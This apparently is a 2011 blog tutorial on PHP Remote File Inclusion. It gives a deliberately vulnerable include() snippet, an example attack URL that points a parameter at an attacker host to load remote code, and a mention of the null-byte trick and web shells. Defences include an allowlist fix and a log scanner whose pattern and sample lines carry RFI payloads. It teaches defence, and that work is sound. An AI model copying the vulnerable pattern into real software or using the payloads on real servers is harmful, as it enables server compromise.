Thursday, November 17, 2011

REMOTE FILE INCLUSION

  • What is RFI?
Remote File Inclusion (RFI) is a vulnerability most often found in web applications. It lets an attacker make the server include, and usually execute, a file fetched from a location the attacker controls, typically by passing a URL in a request parameter that a server-side script hands to a file-inclusion function. The root cause is user-supplied input reaching that inclusion function without proper validation.




An attacker can use RFI for:

  • Running malicious code on the server: any code in the included file is executed by the server, under the operating-system account the web server (or PHP process) runs as. Unless the application executes includes through some sandboxing wrapper, that is full code execution with the server user's privileges, which can lead to a complete system compromise.
  • Running malicious code on clients: the included code can manipulate the response sent to the client and embed content the browser will execute (for example, JavaScript that steals the client's session cookies).

  • Example:
Typically, an RFI attack is performed by setting a request parameter to a URL that points at a file the attacker hosts. Consider the following PHP code (deliberately vulnerable):

<?php
// Vulnerable: the "page" parameter is taken from the request without validation
// ($_REQUEST accepts GET, POST and cookie values alike)...
$page = $_REQUEST["page"];
// ...and concatenated straight into the path handed to include().
include($page.".php");
?>

The first statement extracts the value of the page parameter from the HTTP request. The second concatenates that value with ".php" and includes the result. If the application does not validate the value of page, this code can be exploited, provided the PHP configuration permits URL includes (allow_url_include=On together with allow_url_fopen=On; allow_url_include has defaulted to Off since it was introduced in PHP 5.2.0, and before that version remote includes were governed by allow_url_fopen alone).

Consider the following URL:

http://www.target.com/vuln_page.php?page=http://www.attacker.com/malicious

In this case the included page name will resolve to:
http://www.attacker.com/malicious.php 

Thus the remote file is fetched and included, and any PHP code in it runs on the target server. Appending ".php" is no obstacle: the attacker simply hosts the payload under that name and makes sure their own server returns the PHP source as plain text rather than executing it (in PHP versions before 5.3.4 a %00 null byte in the parameter also truncated the path and discarded the suffix). The most popular payloads are web shells such as c99 and r57, which let the attacker browse the filesystem, upload, view, edit, move and delete files, and even change permissions, all with the privileges of the web server account.
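A hardened replacement for the vulnerable include above, added here as an example and not taken from the original post. The request value is never used to build a path; it is only looked up in a fixed allowlist, so neither "http://..." nor "../" from the client can reach include(). The page names in the allowlist are assumptions, and the script needs PHP 7.1 or later for the nullable type hints.

```php
<?php
// Added example, not code from the original post. Hardened version of:
//     $page = $_REQUEST["page"]; include($page.".php");

// Map of permitted page names to files under this script's directory.
// These names are assumptions for the example.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

// Resolve a request value to an absolute path, or null if it is not allowed.
// Only the allowlist entry is ever concatenated into the path.
function resolve_page(?string $requested, array $allowlist, string $baseDir): ?string
{
    $name = $requested ?? 'home';
    if (!array_key_exists($name, $allowlist)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $allowlist[$name]);
    // realpath() fails if the file is missing; also insist the resolved file
    // still lies under $baseDir (belt and braces against a bad allowlist entry).
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Defense in depth: with allow_url_include=Off (the php.ini default since PHP 5.2)
// include() refuses http://, ftp://, php://input and data: wrappers, so a bug
// introduced later still cannot pull code over the network.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    error_log('warning: allow_url_include is enabled; remote includes remain possible');
}

// $_GET rather than $_REQUEST: the value cannot be smuggled in via a cookie.
$path = resolve_page($_GET['page'] ?? null, PAGES, __DIR__);
if ($path === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $path;
```

The allowlist is what actually closes the hole; the realpath() check and the allow_url_include warning only make the failure mode noisy if someone later edits the allowlist or the php.ini carelessly.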


  • Prevention:
The reliable fix is in the application: never pass user input to include(), require() or their equivalents. Map the request value to a fixed allowlist of page names and build the path from the allowlist entry only, rejecting anything else. In addition, disable URL includes in php.ini (allow_url_include=Off, and allow_url_fopen=Off unless something genuinely needs it) so that even a bug introduced later cannot fetch code over the network.

At the perimeter, the most common protection mechanism is a web application firewall (WAF) matching signatures for known vulnerabilities in the application. Detection and blocking can be improved by maintaining two blacklists derived from observed attacks, one of attack sources and one of the URLs of the remotely included scripts:

1. Advance knowledge of RFI attack sources lets the WAF block an attacker's requests before an exploit attempt even reaches the application.

2. A blacklist of the referenced URLs lets the WAF block exploits against as-yet-unknown (zero-day) vulnerabilities in applications, since attackers reuse the same payload URL across many targets.

3. The IP blacklist built from RFI observations can also be used to block other types of attack issued from the same malicious sources.

Blacklists are reactive and cheap to evade (a new host, a new IP, a percent-encoded or otherwise obfuscated parameter value), so they complement the code-level fix rather than replace it.
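The following script, added here as an example and not part of the original post or any particular WAF product, shows how the two blacklists above are derived in practice: it scans web-server access log lines for request parameters carrying a remote or wrapper URL, records each attempt, and collects the attacking source IPs and the hosts serving the included scripts. The log lines are constructed; the addresses and host names are placeholders. Requires PHP 7.1 or later.

```php
<?php
// Added example, not code from the original post: detect RFI attempts in
// Apache "combined" access logs and build the source-IP and include-host
// blacklists. Sample log lines at the bottom are constructed for this example.

// Parameter values that make include() fetch remote code or read from a PHP
// stream wrapper. This is a detection heuristic, not an exhaustive list.
const RFI_VALUE_PATTERN = '~^\s*(?:https?|ftps?|php|expect|data):/{0,2}~i';

// Parse one combined-format log line; returns null for lines that do not match.
function parse_log_line(string $line): ?array
{
    $re = '/^(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<uri>\S+) [^"]*" (?<status>\d{3})/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return [
        'ip'     => $m['ip'],
        'time'   => $m['time'],
        'method' => $m['method'],
        'uri'    => $m['uri'],
        'status' => (int) $m['status'],
    ];
}

// Return the (name => value) pairs in the request URI whose value looks like a
// remote or wrapper URL. parse_str() percent-decodes, so an attacker sending
// "http%3A%2F%2F..." is caught as well as the plain form.
function rfi_params(string $uri): array
{
    $qpos = strpos($uri, '?');
    if ($qpos === false) {
        return [];
    }
    parse_str(substr($uri, $qpos + 1), $params);
    $hits = [];
    foreach ($params as $name => $value) {
        if (is_string($value) && preg_match(RFI_VALUE_PATTERN, $value)) {
            $hits[$name] = $value;
        }
    }
    return $hits;
}

// One record per (request, parameter) that carries an RFI payload.
function find_rfi_attempts(array $lines): array
{
    $attempts = [];
    foreach ($lines as $line) {
        $entry = parse_log_line($line);
        if ($entry === null) {
            continue;
        }
        foreach (rfi_params($entry['uri']) as $param => $value) {
            $attempts[] = [
                'ip'     => $entry['ip'],
                'time'   => $entry['time'],
                'param'  => $param,
                'url'    => $value,
                'status' => $entry['status'],
            ];
        }
    }
    return $attempts;
}

// Build the two blacklists: attack sources, and hosts serving the included
// scripts (network schemes only; php:// and data: values have no real host).
function build_blacklists(array $attempts): array
{
    $ips = [];
    $hosts = [];
    foreach ($attempts as $a) {
        $ips[$a['ip']] = true;
        $scheme = strtolower((string) parse_url($a['url'], PHP_URL_SCHEME));
        $host = parse_url($a['url'], PHP_URL_HOST);
        if (in_array($scheme, ['http', 'https', 'ftp', 'ftps'], true) && $host) {
            $hosts[strtolower($host)] = true;
        }
    }
    return ['source_ips' => array_keys($ips), 'include_hosts' => array_keys($hosts)];
}

// Constructed sample lines: two attempts from one source (one percent-encoded),
// one php://input attempt, and one legitimate request that must not be flagged.
$sample = [
    '203.0.113.7 - - [17/Nov/2011:10:00:01 +0000] "GET /vuln_page.php?page=http://www.attacker.com/malicious HTTP/1.1" 200 1833 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [17/Nov/2011:10:00:09 +0000] "GET /vuln_page.php?page=http%3A%2F%2Fwww.attacker.com%2Fc99 HTTP/1.1" 200 1833 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [17/Nov/2011:10:02:44 +0000] "GET /index.php?page=php://input HTTP/1.1" 200 902 "-" "curl/7.21.0"',
    '192.0.2.55 - - [17/Nov/2011:10:03:10 +0000] "GET /vuln_page.php?page=contact HTTP/1.1" 200 4413 "-" "Mozilla/5.0"',
];

$attempts = find_rfi_attempts($sample);
foreach ($attempts as $a) {
    printf("%s %-14s %s=%s (HTTP %d)\n", $a['time'], $a['ip'], $a['param'], $a['url'], $a['status']);
}
print_r(build_blacklists($attempts));
```

On the sample input the script reports three attempts (the contact request is not flagged), a source-IP list of 203.0.113.7 and 198.51.100.23, and an include-host list containing only www.attacker.com. A WAF would feed those lists into its blocking rules; a 200 status on a flagged request is the signal that the include may actually have succeeded and the host needs incident response, not just a firewall rule.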


Happy Hacking...Enjoy...

For educational purposes only. Do not misuse it.
